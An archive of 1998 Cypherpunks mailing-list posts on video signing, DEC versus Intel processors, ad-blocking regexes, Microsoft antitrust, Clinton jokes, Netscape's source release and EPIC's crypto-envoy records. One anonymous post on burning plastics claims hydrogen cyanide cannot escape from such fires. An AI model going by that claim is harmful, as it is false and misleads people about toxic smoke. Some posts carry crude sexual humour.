| > One issue to be concerned with is that what the camera sees is not
| > always the truth.  Putting a film set together to film bigfoot is
| > easy.  The fact that the film is authenticated as having come from the
| > camera doesn't mean a whole lot in some cases.
| 
| Doesn't this same sort of issue arise from any other digital signature
| process then? There should be nothing fundamentaly different between the
| characteristics of a video camera signing a frame than a person signing
| email.

	It arises in a different context; with a signature on paper,
you're generally indicating that you've read and consented to whats on
the paper, not that you created it.  The meaning of a camera signing a
video still is not obvious to me.  Is it intended to be 'this is what
we saw through the lens?' or 'this is what really happened?'

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 07:19:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Compaq / DEC buyout (fwd)
Message-ID: <199801262311.RAA29803@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Jan 1998 14:51:45 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: Compaq / DEC buyout (fwd)

> This is simply untrue, that DEC historically has been way ahead of Intel.

I'm not going to get in a pissing contest with Tim, since he obviously has
some connection to Intel...

> The Alpha is a different type of chip. Anyone who has analyzed the past few
> years, the past decade, and the past couple of decades would have a hard
> time making the case that DEC has been ahead of Intel in the overall
> combination of design and manufacturing.

The bottem line is they are both Von Neumann architectures and can be reduced
to a single bit Turing machine. As a result they *most* certainly can be
compaired.

I have owned Intel and DEC machines since the late 70's. I started out on a
DEC PDP 8e in 1976 a friend game me when I was in high school and bought a
S-100 Intel 8080 machine about a year later. Since that time I have owned
80186, 80286, 80836, 80486, and Pentium machines as well as PDP 11/03,
PDP 11/23, PDP 11/34, & MicroVax II. Given a comparison by date the DEC
machines have had a higher clock frequency and generaly been a generation
or so ahead of Intel in the capabilities of the hardware. Further, the
operating system architectures available on the hardware, until the last
6-8 years anyway, also went to DEC when it came to scalability and usability.
The fact that NT was available on both the Intel and Alpha architectures
pretty much at the same time makes any further comparison moot except for
market share (which I alluded to the main forces in an earlier post). Unix
was available on the DEC architectures LONG (what, 20 years?) before it every
even thought about being put on a Intel cpu.

> As you should know, Intel will be making the Alpha chip, as its
> manufacturing capabilities are _overall_ in advance of DEC's. (Beware of

Then why isn't the Intel cranking at 500MHz now like the Alpha? Why is every
market comparison for the chips shows the DEC staying ahead of the Intel in
base clock frequency (I won't even get into architecture efficiencies) for
the next 5-8 years?

> capabilities...Intel has its own R&D fabs, currently developing 0.13 micron
> capabilities...DEC will not be participating in this move to sub-0.20
> micron areas.)

I bet now that Compaq has given them the sorts of resources they had to go
head to head with IBM from the late 60's to the early 80's that could change
pretty quickly, even considering the multi-billion dollar start-up costs of
modern fabs.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Tue, 27 Jan 1998 01:49:10 +0800
To: cypherpunks@Algebra.COM
Subject: Re: More dumb ad sites for your killfile
In-Reply-To: <199801260247.DAA11848@basement.replay.com>
Message-ID: <34ccc2d8.377415894@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 26 Jan 1998 10:55:17 -0600, nobody@REPLAY.COM (Anonymous) wrote:

>
>ads.lycos.com
>ad.doubleclick.net
>ads.altavista.digital.com
>ad.preferences.com
>ph-ad*.focalink.com
>www.news.com/Banners
>ads.lycos.com
>static.wired.com/advertising

For those of you with regexp filters, here's my list:

.*/(live)*(a|A)d(v|vert|s|ising|stream.cgi)*/ 
.*/sponsors.*/ 
.*/ctv22/.ads/ 
.*\.globaltrack\.com 
.*\.doubleclick\.net 
.*/GeoAD.*/ 
.*\.songline.com.*/\@\- 
.*ad(s|[0-9])*\.[a-zA-Z0-9]+\.(com|net)/ 
.*linkexchange.com 
.*focalink.com 
.*nytsyn\.com/gifs/ 
.*(news|cnet|gamecenter|builder|search|download|shareware|activex|browser(s)*)\.com.*Banners/

.*nrsite.com 


-- Phelix





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 07:46:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Processor Architecture Analysis - Reference
Message-ID: <199801262340.RAA29988@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

If you're interested in the basic technology used in many of the current
and proposed processor architectures I strongly recommend the following:

Advanced Computer Architectures: A design space approach
S. Sima, T. Fountain, P. Kacsuk
ISBN 0-201-42291-3
~$50.00

It was published in 1997 and covers various analysis of many of todays
CPU's (unfortunately it doesn't do the Alpha) and discusses means to
get realistic comparisons between them. It also covers some of the white
paper architectures that have come out in the last 3-4 years on proposed
architecture upgrades and alternatives.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@vorlon.mit.edu>
Date: Tue, 27 Jan 1998 06:55:54 +0800
To: cypherpunks@cyberpass.net
Subject: Fear, loathing, and Bill Gates (fwd)
Message-ID: <Pine.LNX.3.95.980126174316.24051A-100000@vorlon.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 26 Jan 1998 14:14:51 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FC: Fear, loathing, and Bill Gates

********

Date: Wed, 21 Jan 1998 16:42:08 -0500
From: Don Bx <dboudreaux@fee.org>
To: declan@well.com
Subject: Re: More on Don Boudreaux "Calm Down" letter on Microsoft


Declan,

	I had a thought that I must share.

	In reflecting upon the genuine hatred and fear that people increasingly
have for Bill Gates and Microsoft, it occurred to me that this hatred and
fear have much in common with the hatred and fear stirred up a decade or so
ago against Japan.  In both cases, people proved their affection for
Japanese goods by buying them, but they also grew leary of Japan after
being barraged on the air-waves by idiot pundits who insinuated that Japan
had some sort of recipe for taking over the American economy.  Economic
serfdom was near, avoidable only by trade restraints.

	And, of course, behind this fear-mongering were U.S. rent-seeking firms
that sought to be relieved of having to compete as vigorously as otherwise.

	Needless to say, Japan was never a threat to "take over" the American
economy, or to harm it in any way.  The same is true of Microsoft (as long
as it doesn't rely upon government favors).

	The fear and hatred in both cases -- against Japan in the 1980s and
against MS today -- is illogical and uninformed.  But it is, for MS,
increasingly real.

Don

*********

Date: Thu, 22 Jan 1998 23:02:07 -0600 (CST)
From: Mac Norton <mnorton@cavern.uark.edu>
To: Declan McCullagh <declan@well.com>
Cc: politech@vorlon.mit.edu
Subject: Re: FC: More on Don Boudreaux "Calm Down" letter on Microsoft

Let me see if i get this right:DOJ got guns , MS don't got guns,
therefore I'm for MS.    Is that it?   Gee thee's  some heavy
intellectual discourse going on here, you betcha.
MacN

*********

Date: Wed, 21 Jan 1998 16:23:25 -0500 (EST)
From: Donald Weightman <dweightman@Radix.Net>
To: declan@well.com
Subject: Re: FC: More on Don Boudreaux "Calm Down" letter on Microsoft

DB doesn't seem to know much about antitrust -- it *does* scrutinize
strongarm tactics when wielded by someone with market power, as MSFT almost
certainly has.

The claim about harm to the economy is pretty far ranging for someone who
seems to have no expertise in the field. As an example of where antitrust
has done good, I'd point to the gov't-mandated restucturing of the electric
utility industry in the '30's (actually administered by the SEC), which can
be argued to have laid the groundwork for the huge productivity gains that
industry made for the next three decades.

Cheers

Don

********

Date: Mon, 26 Jan 1998 16:59:05 EST
From: JEisenach@aol.com
To: declan@well.com
Subject: Re: FC: "Calm down!" -- Don Boudreaux letter to NYT on Microsoft

Now that Microsoft has given up its inexplicable defense of an indefensible
licensing arrangement, it may be a lot easier for everyone involved to "calm
down."

Calming down should not, however, mean giving Microsoft carte blanche to use
its undeniable market power to shape the future of the market for software.

What it should mean is devising a workable policy for applying sound antitrust
principles to the software business -- and that's a very big task.

Many of Microsoft's arguments have merit.  It is true, for example, that rapid
innovation and low (physical) capital requirements for entry make its monopoly
more vulnerable than it otherwise might be.

However, other arguments Microsoft has offered -- for example, falling prices
-- are pretty lame.  Falling relative to WHAT? is the relevant question (look
at industrial prices during the second industrial revolution -- which went
through long periods of decline despite the emergence of the steel, oil,
railroad, etc. trusts).

As for Microsoft's "opponents," their case has a fair amount of appeal -- and
it's not just visceral.  Microsoft clearly has market power in the market for
operating systems.  Operating systems are required for personal computers to
operate.  Microsoft has exercised its market power pretty aggressively.  And,
it shows every intention of continuing to exercise its market power to delay
innovations that threaten it and to extend its dominant position into future
generations of technology.

I don't think many people dispute anything in the previous paragraph.  What
people ARE concerned about, of course, is the potential for an overly
intrusive and regulatory approach by government that could slow down
innovation -- a policy built around the idea of protecting competitors rather
than protecting competition.  I frankly haven't seen Joel Klein say anything
that suggests they are headed in this direction -- but I sure agree that
"eternal vigilance is the price of liberty."

Now that we all have a chance to "calm down," my hope is that a rational
debate can emerge on the question of how the goals of antitrust law  (i.e. a
market free of impediments to competition, regardless of their source) can
best be pursued in the software/computing business.  And, I'm not prepared to
concede that letting Microsoft exercise its market power without any
restraints at all is the best we can do, even in this very imperfect world.

To close with a plug:  on February 5, The Progress & Freedom Foundation will
be hosting a conference at the Four Seasons Hotel in DC on this very topic.
Participants include a virtual "who's who" of the market-based "Chicago
school" of antitrust economists and lawyers -- Nick Economides, Benjamin
Klein, James C. Miller, Tim Muris, Dan Oliver, Bob Tollison, Robert Willig,
etc.  It's open to the public and reasonably priced.

For information, see WWW.pff.org.

********

Date: Mon, 26 Jan 1998 09:02:15 -0500
From: Don Bx <dboudreaux@fee.org>
To: declan@well.com

   My comment about the DOJ having guns and Microsoft not has drawn fire. 
Fair enough.  But I defend my point, which is this: Microsoft gets
customers only by offering them deals that they are free to accept or
reject.  No coercion is involved.  If you don't buy MS products, no one
threatens you with imprisonment or violence.

   In contrast, when government regulates commerce (beyond the enforcement
of contracts and traditional tort and criminal law) it dictates the terms
of exchanges -- ultimately at the point of a gun -- that we cannot be
certain are mutually advantageous.

  When A and B exchange voluntarily with each other, we can be sure that
both A and B each believes himself to be better off as a consequence of the
exchange.  When a third party wielding the threat of coercive power
prevents these voluntary exchanges -- or imposes contract terms that would
not otherwise be part of these exchanges -- we cannot be certain that the
exchanges yield as much mutual benefit as when these exchanges are
voluntary.

  Government possesses the monopoly authority to initiate coercion.  This
is an awesome power that in a civil and free society should be used
sparingly.  It should not be used to prevent firms from engaging in
peaceful and voluntary exchanges with adults.

Don Boudreaux

*******


--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Tue, 27 Jan 1998 06:57:48 +0800
To: "Roger J Jones" <cyber@ibpinc.com>
Subject: RE: Latest Clinton dodge?
In-Reply-To: <v03007809b0f2af59255b@[168.161.105.216]>
Message-ID: <v0300780eb0f2c1fb86bb@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Not as far as I'm aware. Though today Clinton's attys asked the judge to
speed up the trial to get it over with ASAP.

I'm sure this will be leaked as necessary. Jones and Starr attorneys rank
up there with the White House when it comes to planned leaks.

-Declan



At 15:45 -0600 1/26/98, Roger J Jones wrote:
>Thanks for the info - while I am at it - has anyone ever disclosed the
>"distinguishing characteristic" that Paula Jones claims will prove its Bubba
>Bill?
>
>-----Original Message-----
>From: Declan McCullagh [mailto:declan@pathfinder.com]
>Sent: Monday, January 26, 1998 3:26 PM
>To: Roger J Jones
>Cc: cypherpunks@cyberpass.net
>Subject: RE: Latest Clinton dodge?
>
>
>Not as far as I'm aware. Tho Gennifer Flowers said years ago that Clinton
>distinguishes between the two.
>
>You may be thinking of his "there is no sexual relationship" quip last Wed,
>which was duly dissected and analyzed; journalists remembered his artful
>dodge on the pot-smoking affair.
>
>I think we note in our (rather extensive) cover package in this week's
>magazine that Sen.Hatch and Speaker Gingrich also make this kind of
>distinction, at least according to women who claim they're in a position to
>know.
>
>Interestingly, they're going to be the fellows sitting in judgment if this
>goes to impeachment and trial...
>
>-Declan
>
>
>
>At 14:35 -0600 1/26/98, Roger J Jones wrote:
>>Did not Clinton say publicly that he did not consider oral sex "sexual
>>relations" in some statement recently?
>>
>>[mailto:owner-cypherpunks@cyberpass.net]On Behalf Of Declan McCullagh
>>Clinton said this morning:
>>
>>>>>>
>> I want you to listen to me.  I'm
>>going to say this again.  I did not have sexual relations with that
>>woman, Miss Lewinsky.  I never told anybody to lie, not a single time
>>-- never.  These allegations are false.
>><<<<
>>
>>>>>>The question then becomes, of course, what does "sexual relations"
>mean?
>>
>>Is it oral sex?
>>
>>-Declan
>>
>><<<<<







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 07:58:06 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Signing video...
Message-ID: <199801262346.RAA30042@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I was exchangin idea with a couple of members off-list and an idea came to
me about how to time stamp the frames. It would require a minor modification
to the WWV transmission but it wouldn't be much. Have the WWV transmitters
sign each 'tick' of the clock and have a WWV receiver in the vcr. This would
allow time stamping the frame with a signed reference that could be checked.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Tue, 27 Jan 1998 10:12:56 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: Cylink and Organized Crime?
In-Reply-To: <1.5.4.32.19980126174215.007173cc@pop.pipeline.com>
Message-ID: <v03102801b0f2ed78c4da@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



I worked at Cylink as Manager of Business Development from April 1992 -
April 1994.  I reported directly to both Lew Morris (CEO) and Jim Omura
(CTO) and know Jim socially, as well.  I know of no instance in which I
suspected Cylink had criminal ties (other than our own govenment ;-)

I heard that NSA people from the Fort (Meade) did request that Cylink
supply 'special' crypto devices to drug cartele clients I don't believe
they were accomodated (probably not enough lead time or Cylink was offered
too little money).

Ademco is a major stockholder, as are Jim and Lew (~20% combined) and
Renessisance Capital.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 27 Jan 1998 01:36:34 +0800
To: cypherpunks@cyberpass.net
Subject: cookies and spam
Message-ID: <199801261722.SAA01432@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> 5. .reba.com (country music) cypherpunks cypherpunks
> wafer RebaNet%5FPWD=cypherpunks
> wafer RebaNet%5FUID=cypherpunks

Yes, and thank you for signing up the list for their spam.

cypherpunks/cypherpunks also works for dejanews, but at least I had the
sense to send the replies to alt.anonymous.messages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@dis.org>
Date: Tue, 27 Jan 1998 10:39:23 +0800
To: DC-Stuff <dc-stuff@dis.org>
Subject: Former US spy ship now a tourist attraction
Message-ID: <Pine.BSI.3.95.980126183039.1560D-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



TOKYO (Reuters) [1.26.98] North Korea has turned the Pueblo, 
a U.S. navy intelligence ship captured 30 years ago, into a 
tourist attraction to attract badly needed foreign exchange, 
a Japanese scholar said Monday.
 
Shinobu Oe, professor emeritus of contemporary history at 
Ibaraki University, told Reuters he visited the North Korean 
port of Wonsan, where the vessel is docked, on October 29.
 
"As far as I know the North Koreans have been showing the 
ship to Japanese tourists since August," Oe said. "They tell 
tourists it's the Pueblo."
 
The capture of the Pueblo and its crew by North Korean patrol 
boats off Wonsan in January 1968 held the administration of 
then-U.S. President Lyndon Johnson at bay for months.
 
Japan's Asahi newspaper Monday published a photograph Oe took 
of the ship, which showed it bristling with antennae and wires. 
The professor said he could only view the ship from the dock.
 
"It sure looks like the Pueblo," said a U.S. embassy naval 
attache in Tokyo who saw the photograph.
 
Oe said North Koreans at the port gave no information about 
the ship or how it had been used for the past 30 years.
 
Attracting foreign currency has become increasingly important 
to North Korea after years of economic decline and failed 
harvests that have left the isolated Stalinist nation 
struggling to feed its people.
 
The standoff prompted by Pyongyang's seizure of the Pueblo 
30 years ago led to a U.S. state of naval alert rivalling 
the Cuban missile crisis in 1963.
 
The crew was finally released in December 1968, but the 
ship stayed in North Korean hands.

Pyongyang portrayed the incident as a huge blow to the 
prestige of the U.S. superpower, which was then in the 
throes of the controversial Vietnam War.


== 
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston 
==
http://www.dis.org/erehwon/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 27 Jan 1998 08:12:31 +0800
To: "Ernest Hua" <cryptography@c2.net>
Subject: RE: Update on New Zealand crypto policy
Message-ID: <199801262347.SAA24665@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/26/98 3:30 PM, Ernest Hua (Hua@teralogic-inc.com)  passed this
wisdom:

>Need help:  Can anyone get to this URL?
>
>Ern
>
 [snip]
>	 
>	  http://www.cs.auckland.ac.nz/~pgut001/policy/
>	 

 I got to it with no problems on first try from East Coast USA.


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNM0glz7r4fUXwraZAQFRGQf9F4R1EhPLwsSP84l5QcKk6KMhU341ox36
PincU6VSpYR8bq7CMSMh7G5f/H+3MkXNpnStGGI2H/jr/ggj+VeFtAZE/8WG5Mvw
RbzbHxXKxq5one7kNc8qWMtWyd5vh6T+WUcyotUdvVBM5LAwP6sgv60vRsslbAYq
8jx4CMcWi8AM49vZknWAVQ+0QKWXthD5ltMFyLK8racRmIccFCsn//hDY0m7P+4I
fbA3uKY5ESnJA5dUMCdree9tqB55R8iW/BdSKodemiO56FdClVOBdynVBFrchmGr
zauO82EwceXiG3m2R44Zd7XPp0OfupzkB5+qZgWTeUR87SCnlzvrhw==
=eeTo
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "The illiterate of the 21st century will not be those who cannot read 
and 
  write, but those who cannot learn, unlearn, and relearn." -- Alvin 
Toffler






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 27 Jan 1998 02:20:20 +0800
To: cypherpunks@ssz.com
Subject: Re: Burning papers (fwd)
In-Reply-To: <199801260322.VAA25747@einstein.ssz.com>
Message-ID: <199801261805.TAA08049@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> wrote:

> > Plastic should burn fine, as most is polyethylene (CH2) which produces
> > water and carbon dioxide when burned, leaving virtually no residue.  The
> > only plastic that you'd need to worry about is chlorinated stuff like PVC.
> 
> If it has any N in it then don't burn it in a closed space otherwise you
> will get various xCN compounds. These are very toxic, KCN is Potassium
> Cyanide.

As usual Jim, your posting is prolific but your science is lacking.

Since N2 is highly stable, CN ions are not an energetically favored result. 
Some amount may be produced, but CN- is highly reactive and will quickly
bind to whatever it comes in contact with (usually oxygen).  The only way
cyanide could escape in gaseous form is as HCN, however this cannot happen
because the hydrogen has a lower activation energy for combining with
oxygen, and thus the reaction is starved of free hydrogen by the time the
carbon begins to burn.  Various other nitrogen compounds are produced,
such as NOx, but this is true of all combustion and not limited to plastic.

A more likely (and deadly) result, which you did not mention, is sulfur
dioxide.  Most plastics don't contain sulfur, but rubber products may.
Sulfur dioxide combines with water to produce H2SO3 and H2SO4 (sulfuric
acid) which is quite toxic if inhaled.

> When my house burned 3 years ago both my cats were killed because of smoke
> inhalation (approx. 9 computers and bunches of other plastics went up). It
> was not a pretty sight. Congealed blood from lung eruptions on their lips,
> very blue tinge to the skin, etc. Not a pretty sight.

Most smoke inhalation deaths result for particles clogging the lungs rather
than gases.  Cats have a tendency to hide when they feel threatened or
injured, an instinct which often imperils them in a burning building.

Also remember that computers have materials in them other than plastic, for
example lead and other heavy metals.  Batteries and electrolytic capacitors
are also sources of many toxic materials.

In short, it's not the plastic that's toxic, it's all the other crap (ink,
dye, glue, solder, batteries, dielectric, etc)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 27 Jan 1998 10:00:47 +0800
To: cypherpunks@toad.com
Subject: RE: Latest Clinton dodge?
In-Reply-To: <199801262142.PAA09728@pc1824.ibpinc.com>
Message-ID: <cPVXJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Roger J Jones" <cyber@ibpinc.com> writes:

> 
> Thanks for the info - while I am at it - has anyone ever disclosed the
> "distinguishing characteristic" that Paula Jones claims will prove its Bubba
> Bill?
> 
Can you spell "curvature"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Tue, 27 Jan 1998 11:36:21 +0800
To: cypherpunks@toad.com
Subject: Re: Latest Clinton Dodge?
Message-ID: <Pine.LNX.3.95.980126191937.29500A-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain




       
>Clinton said this morning:
>   
>>>>
>I want you to listen to me. I'm
>going to say this again. I did not have sexual relations with that
>woman, Miss Lewinsky. I never told anybody to lie, not a single time
>-- never. These allegations are false.
><<<<
>   
>The question then becomes, of course, what does "sexual relations"
>mean?
>   
>Is it oral sex?
>   
>-Declan

It seems to be some sort of 'southern thing'. Of course a good Catholic
boy from Detroit would never swallow (opps!) a sleezy end-run around
the moral goal-posts of life like that. I can think of no better authority
to invoke than Kinky Friedman, the immortal bard of Kerrville, Texas and
notorious ring-leader of the band known as "The Texas Jewboys" ( famous
for such country & western hits as "They Don't Make Jews Like Jesus
Anymore", "I'm Proud To Be An Asshole From El Paso", "The Ballad of Charles
Whitman", and many others - all available on his recently released CD).
Hit it Kinky!...

  Waitret, Please, Waitret
  (Kinky Friedman, Major Boles, Roscoe West)
  
   Well, I pulled into Dallat on a cold December day
   Bought coffee and a doughnut at the Greasy Spoon Cafe,
   Spied me a pretty young waitret standing by her tray,
   But she couldnt believe her sweet young ears when the waitret heard me
   say:
   
   Oh, waitret, please, waitret, come sit down on my fate,
   Eatin aint cheatin, Lord it aint no disgrace.
   Oh, bring me a Lone Star, make it, make it a case
   Waitret, please, waitret, come sit down on my fate.
   
   Well, I walked up to the jukebox feeling kind of mean,
   The waitret said, Hey, stupid, thats a, thats a cigarette machine!
   Well, look-a here, young waitret, would you care to make a bet,
   And if that there aint a jukebox, you can smoke my cigarette!
   
   Oh, waitret, please, waitret, come sit down on my fate,
   Eatin aint cheatin, Lord it aint no disgrace.
   Oh, bring me a Lone Star, make it, make it a case
   And waitret, please, waitret, come sit down on my fate.
   
   Youre the prettiest thing in Dallat, is Dallat your home ?
   No, I come all the way from Houton and I feel so all alone.
   I used to live in Autin then I moved up to big D
   In hopes to get my big break on national TV.
   
   Oh, waitret, please, waitret, come sit down on my fate,
   Eatin aint cheatin, Lord it aint no disgrace.
   Oh, bring me a Lone Star, make it, make it a case
   Waitret, waitret, waitret, waitret, sit down on my fate.

It's even funnier with the music of course. Kinky Friedman
(http://www.kinkyfriedman.com) was kind of a 70's cult figure.
He now writes mystery novels. According to Willie Nelson, 
...the best whodunit writer to come along since Dashiell
What's-his-name." 

As for Clinton, what can I say? What a pathetic, third-rate
dickhead. Somebody flush the White House. It's starting to
stink.

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 27 Jan 1998 11:34:56 +0800
To: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>
Message-ID: <34CD53FD.363A9C8C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



Markus Kuhn wrote:
> root wrote on 1998-01-23 01:29 UTC:
>
>> [Press Releases]
>> http://www.netscape.com/newsref/pr/newsrelease558.html?cp=nws01flh1
>>
>> NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE
>> CODE AVAILABLE FREE ON THE NET
> 
> Excellent!
> 
> Finally mainstream software companies start to understand that security
> critical software has to be provided to the customer in full compilable
> source code to allow independent security evaluation.

Don't hold your breath.  We're still bound by US export regulations, so
we won't be able to export crypto-relevant source code.  We'll release what
we can, but you probably won't be satisfied.

Of course, there's always the option for some enterprising individuals
outside the US to replace the missing pieces.

-- 
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice.  You must understand Tao before      | tomw@netscape.com
transcending structure.  -- The Tao of Programming   |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Tue, 27 Jan 1998 11:46:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Signing video...
Message-ID: <v03102805b0f3080902ed@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>Hi,
>
>I was exchangin idea with a couple of members off-list and an idea came to
>me about how to time stamp the frames. It would require a minor modification
>to the WWV transmission but it wouldn't be much. Have the WWV transmitters
>sign each 'tick' of the clock and have a WWV receiver in the vcr. This would
>allow time stamping the frame with a signed reference that could be checked.

Although this could reduce the cost and power consumption in the camera how
does this guarantee that the signature information wasn't inserted later.
With today's excellent digital postprocessing it could be very hard to
detect.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 27 Jan 1998 10:05:14 +0800
To: cypherpunks@cyberpass.net
Subject: U.S. crypto czar's travel records revealed
Message-ID: <v03007803b0f2ee9848ac@[204.254.22.64]>
MIME-Version: 1.0
Content-Type: text/plain



>From EPIC newsletter

=======================================================================
[3] EPIC Obtains U.S. Crypto Czar's Travel Records
=======================================================================

Following a year-long legal battle, EPIC has obtained over 500 pages of
materials from the U.S. State Department on the international travels of
David Aaron, the former U.S. Envoy for Cryptography.  Aaron also served
as U.S. Ambassador to the Organization for Economic Cooperation and
Development when the OECD was developing its encryption policy
guidelines.

The released documents show Ambassador Aaron made frequent trips around
the world lobbying for international adoption of key escrow encryption.

He visited Australia, Belgium (both the European Union & Belgian
governments), Canada, France, Germany, Japan, Switzerland and the United
Kingdom.  The documents also indicate that he went to South Africa, and
met with the counselor of the Latvian embassy in Paris and with Russian
Finance Ministry officials.

Even before Aaron was appointed as President Clinton's "Special Envoy for
Cryptography," U.S. State Department messages indicate that the United
States was making overtures to various countries via American embassies
around the world.  These include the diplomatic posts in Canberra,
London, Tokyo, Ottawa, Tel Aviv, Paris, Bonn, The Hague and Moscow.  One
message to these foreign posts announced the revised U.S. cryptography
export policy (the key recovery within two years or "no export" rule).
The public announcement of that policy was made on October 1, 1996.

Aaron apparently was not always greeted warmly in his travels.  In Japan,
the government requested that the meetings be kept secret and that the
press not be informed.  Even the U.S. Embassy in Japan was less than
enthusiastic -- the embassy suggested that Aaron and his delegation could
take the airport bus to their hotel rather than be picked up by an
embassy driver.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail <mail@reba.com>
Date: Tue, 27 Jan 1998 06:55:56 +0800
To: "Random Q. Hacker" <cypherpunks@Algebra.COM>
Subject: Reba Performs What If Tonight!
Message-ID: <19980126163925.39547423.in@mail.marthastewart.com>
MIME-Version: 1.0
Content-Type: text/plain



Reba will perform "What If" tonight on the 25th American Music Awards!
